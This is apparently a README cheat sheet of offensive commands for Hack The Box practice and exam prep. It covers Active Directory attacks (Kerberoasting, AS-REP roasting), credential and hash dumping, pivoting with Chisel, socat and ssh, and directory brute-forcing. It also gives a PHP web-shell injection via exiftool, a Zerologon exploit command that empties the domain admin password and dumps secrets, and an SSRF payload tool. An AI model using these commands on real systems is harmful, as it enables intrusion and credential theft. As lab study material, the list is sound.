Notes Taken for HTB Machine
Will be periodiclly updated, created with the intend of unwraping all possible ways and to prep for exams
created & maintained by: cyberwr3nch
| File | Contents |
|---|---|
| Active Directory | Bruteforce SMB, Winrm Bruteforce, AD User Enumeration, Mounting Disks, BloodHound, rpcclinet |
| Directory Enumeration | gobuster, rustbuster, wfuzz, vhosts |
| File Transfer | ftp, python, netcat, http, powershell curling, metasploit, smb, net use, impackets |
| Nmap | Nmap, PortScanning, Tags |
| Notes | DNS Recon, 302 Redirects, Burpsuite, MySQL, Passwd File, Port Forwarding |
| Password Cracking | hashcat, john, hashexamples, zip file cracking |
| Post Exploitation | current user, network infos, locate, Antivirus Disabling, registry, priviledges, running process, plink, stored credentials, wmic |
| Regular Commands | ls, Grep, AWK, Curl, wget, Compression and decompression of files, Find, xclip, Misc, bashLoops, sed, tr, tail, watch |
| Reverse Shells | Bash TCP, Bash UDP, Netcat, Telnet, Socat, Perl, Python, PHP, Ruby, SSL, Powershell, AWK, TCLsh, Java, LUA, MSF Reverse Shells(war, exe, elf, macho, aspx, jsp, python, sh, perl), Xterm, Magicbytes, Exiftool, Simple PHP oneliners |
| Web Attacks | sql-injection, login bruteforce( wfuzz, hydra) |
| Docker Commands | installation, building, pulling, updating, deleting, listing, cheatsheet |
| Git Commands | clone, commit, push, pull, add, log, deleted file, checkout |
| Pivoting | POST Exploitation, Pivoting, Chisel |
| Tool | Use | Command Syntax |
|---|---|---|
| Bloodhound.py | BloodHound written in python. Used to obtain AD infromations from a windows machine | python3 bloodhound-python -u <username> -p <passphrase> -ns <machineIP> -d <domainname> -c all |
| Impackets | Swiss Knife for most Windows AD attacks | python GetNPUsers.py <domain_name>/ -usersfile <users_file> = ASREPRoasting python GetUserSPNs.py <domain_name>/<domain_user>:<domain_user_password> = Kerberoasting |
| Kerbrute | A tool written in GO to enumerate AD users | ./kerbrute userenum --dc <machine ip> -d <doaminname> <users_file> |
| CredDump | Used to obtain Cached Credentials, LSA Secrets and Password hash when system and sam files are available | ./pwdump.py <system hive> <sam hive> = Obtain Password Credentials ./cachedump.py <system hive> <sam hive> = obtain cached credentials ./lsadum.py <system hive> <sam hive> = Obtain LSA Dumps |
| PwdDump | After getting the administrative access, running this will get the password hashes |
.\PwDump7.exe |
| ApacheDirectoryStudio | LDAP browser which is used to analyze LDAP instance running on linux (CREDS required), here transferring the LDAP running on a victim machine and accessing it in the attacker machine | sudo ssh -L 389:172.20.0.10:389 lynik-admin@10.10.10.189 |
| Tool | Use | Command Syntax |
|---|---|---|
| Chisel | Used to forward a service running on a port in the victim machine | ./chisel server -p <port no.> --reverse = on the attacker machine ./chisel client <attackerip:port> R:1234:127.0.0.1:1121 = Forwards the service running on port 1121 to the port 1234 on attackers machine |
| socat | Swiss Knife for Port forwarding | socat TCP-LISTEN:8000,fork TCP:<machineIP>:<port> = Listens on every connection to port 8000 and forwards to the machineIP and its port socat TCP-LISTEN:9002,bind=<specific ip>,fork,reuseaddr TCP:localhost:<port> = forward all incoming requests to the port 9002 from to the localhost port, reuseaddr is used to specify socat use the address (eg. localhost) even if its used by other services |
| plink | SSH Putty in CLI mode | .\plink.exe <user@host> -R <remote port>:<localhost>:<local port> .\plink.exe kali@10.10.14.32 -R 8888:127.0.0.1:8888 = port forwards the service running on victim machines port 8888 to the attacker machines 8888 |
| ssh | uses the built in ssh service to port forward a service | Remote Port Forwarding: > Command should be entered on the compromied machine ssh <user@host> -R <host>:<port open in host>:<localhost>:<port in victim machine> -N -f ssh cyberwr3nch@192.168.XX.XX -R 192.168.XX.XX:3000:127.0.0.1:80 -N -f = Open the port 3000 in the cyberwr3nch's machine and forwards the service running in port 80 to the cyberwr3nch's 3000. So visiting 127.0.0.1:3000 in cyberwr3nch's browser will be the same of visiting 127.0.0.1:80 on the victim machine ================ Dynamic Port Forwarding: > Command to be executed on the attacker machine ssh -D <port on attacker machine> <victim@victim_machine>ssh -D 1234 victim@192.168.XX.XX = Command to be executed on the attackers machine, the port 1234 should be configured in the /etc/proxychains.conf as socks4 127.0.0.1 1234. If SSH Dynamic port forwarding fails, go for chisel method ================ Local Port Forwarding: > Command to be executed on the attacker machine ssh -L 127.0.0.1:<port to req>:<internal ip>:<internal port> <intermediate_user@host> ssh -L 127.0.0.1:8080:10.10.10.11:80 cyberwr3nch@10.10.10.10 = Whatever request to made to the attacker machine's port 8080 will travel through 10.10.10.10 and reach 10.10.10.11:80 |
| Tool | Use | Command Syntax |
|---|---|---|
| DirSearch | Directory enumeration Tool | python3 dirsearch.py -u <url> -e <extn> |
| Gobuster | Directory enumeration tool written in GO | gobuster dir -u <url> -w <wordlist> -x <extn> -b <hide status code> -t <threads> |
| RustBuster | Direcotry Enumeration tool written in rust | rustbuster dir -u <url> -w <wordlist> -e <extn> |
| Tool | Use | Command Syntax |
|---|---|---|
| LinEnum | Post Enumeration scripts that automates enumeration | ./LinEnum.sh |
| LinPeas | Post Enumeration Script | ./linpeas.sh |
| WinPEASbat/WinPEASexe | Windows post enumeration script and exe | .\winPEAS.bat |
| Tool | Use | Command Syntax |
|---|---|---|
| Exiftool | Inspects the meta data of the image, Injects php payload in the comment section for file upload vulns, which can be added double extension file.php.ext |
./exiftool -Comment='<?php system($_GET['cmd']); ?>' <image.ext> |
| Git Dumper | Dump the Github repo if found in website | ./git-dumper.py <website/.git> <output folder> |
| lxd-alpine builder | When a victim machine is implemented with lxc the privesc is done with this | article here |
| Php-reverse-shell | Php reverse shell, when an upload is possible change the IP and make req to obtain reverse shell | |
| ZerologonPOC | CVE-2020-1472 Exploit, sets the domain admin password as empty pass and dump the secrets. PS: Latest Version of Impackets is required | python3 set_empty_pw.py machinename/domainname machine IP; secretsdump.py -just-dc -no-pass machinename\$@machineip |
| Gopherus | SSRF with gopher:// protocol |
gophreus --exploit phpmemcache |
These are the urls that has the writeups for active and retired machines
- snowscan's Blog ⭐
- xct's Blog ⭐
- My Blog 💀 (inactive for a period of time)
- nav1n
- 0xPrashanth
- BinaryBiceps
- p0i5on8
- lUc1f3r11's Blog
- subham399
- Jacob Riggs
- elbee infoSec
- Kali-education
- roman.de
- 0xdf's Blog
- 0xrick's Blog
- SecJuice
- Sector 035 OSINT ⭐
Constantly updating from MAY 3rd 2020
A noob cyberwr3nch🔧
A member of TCSC
Learn and Spread <3
xoxo💙
